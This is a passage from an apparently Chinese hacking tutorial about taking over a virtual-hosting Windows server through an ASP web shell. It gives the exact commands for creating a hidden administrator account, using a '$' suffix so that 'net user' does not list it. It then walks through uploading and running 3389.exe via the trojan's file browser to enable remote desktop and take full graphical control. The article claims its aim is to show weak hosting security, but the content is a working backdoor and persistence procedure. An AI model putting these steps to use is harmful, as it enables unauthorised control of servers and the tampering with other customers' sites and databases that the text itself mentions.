2、建立简单得隐藏帐户
既然我们已经拥有了管理员权限,那么新建一个管理员帐户将是一件轻而易举的事。在“命令/参数”选项中填入“net user piao$ 123456 /add”,建立一个帐户名为piao,密码为123456的帐户。命令成功运行后接着输入“net localgroup administrators piao /add”将我们新建的帐户加入管理员组,这样一个简单的隐藏管理员帐户就建立完毕了。
提示:在新建的帐户名后面加入“$”符号,可以简单得隐藏该帐户。当管理员在“命令提示符”中输入“net user”命令来查看帐户情况时将无法看到该帐户。如果想查看该帐户可以在“命令提示符”中输入“net user piao$”,或者进入“控制面板→管理工具→计算机管理→本地用户和组”中查看。
三、开启终端服务,完全控制主机
到这一步,我们已经拥有了虚拟主机服务器的最高控制权,但是以后的操作都需要以命令行的形式实现,所以我们可以开启服务器的远程终端服务,和服务器管理员一样以图形界面操作服务器!
开启服务器的远程终端服务我们需要一个小工具——3389.exe,只要将它上传到服务器,然后直接运行即可。进入ASP木马的“Shell.Application文件浏览器”,点击“上传”按钮,选中3389.exe后将其上传到“c:\windows\system32”目录(Windows2000为c:\winnt\system32)目录)。完成后返回“WScript.Shell命令行操作”,在“命令/参数”中输入“3389.exe”即可运行。运行3389.exe后,服务器会自动重起,重起结束后我们进入本机的“菜单→程序→附件→“通讯”,使用其中的“远程桌面连接”进行连接(如图4)。
图4 服务器的远程桌面
现在,我们已经轻松获得了一台虚拟主机服务器的管理员权限,可见其简陋的安全措施和服务器管理员淡薄的安全意识。我们可以修改、删除服务器上任一虚拟主机中的文件,甚至修改虚拟主机系统的数据库,享受“免费”的午餐,当然这不是本文的目的所在。由此可见,如果将自己的网站放在这样的虚拟主机上,那么安全将是毫无保障的。
|
